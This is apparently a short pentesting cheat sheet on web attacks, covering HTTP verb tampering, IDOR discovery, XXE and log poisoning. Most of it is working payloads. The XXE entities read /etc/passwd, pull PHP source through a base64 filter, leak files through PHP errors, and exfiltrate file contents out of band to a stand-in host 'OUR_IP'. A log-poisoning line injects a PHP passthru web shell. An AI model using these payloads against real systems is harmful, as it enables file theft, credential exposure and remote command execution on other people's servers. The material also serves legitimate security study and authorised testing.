Web attacks
HTTP Verb Tampering
HTTP Method
HEADPUTDELETEOPTIONSPATCH
Command
Description
-X OPTIONS
Set HTTP Method with Curl
IDOR
Identify IDORS
In
URL parameters & APIsIn
AJAX CallsBy
understanding reference hashing/encodingBy
comparing user roles
Command
Description
md5sum
MD5 hash a string
base64
Base64 encode a string
XXE
Code
Description
<!ENTITY xxe SYSTEM "http://localhost/email.dtd">
Define External Entity to a URL
<!ENTITY xxe SYSTEM "file:///etc/passwd">
Define External Entity to a file path
<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">
Read PHP source code with base64 encode filter
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">
Reading a file through a PHP error
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">
Reading a file OOB exfiltration
Logpoisoning
" GET / < ?php passthru($_GET['offsec']); ?> "
Last updated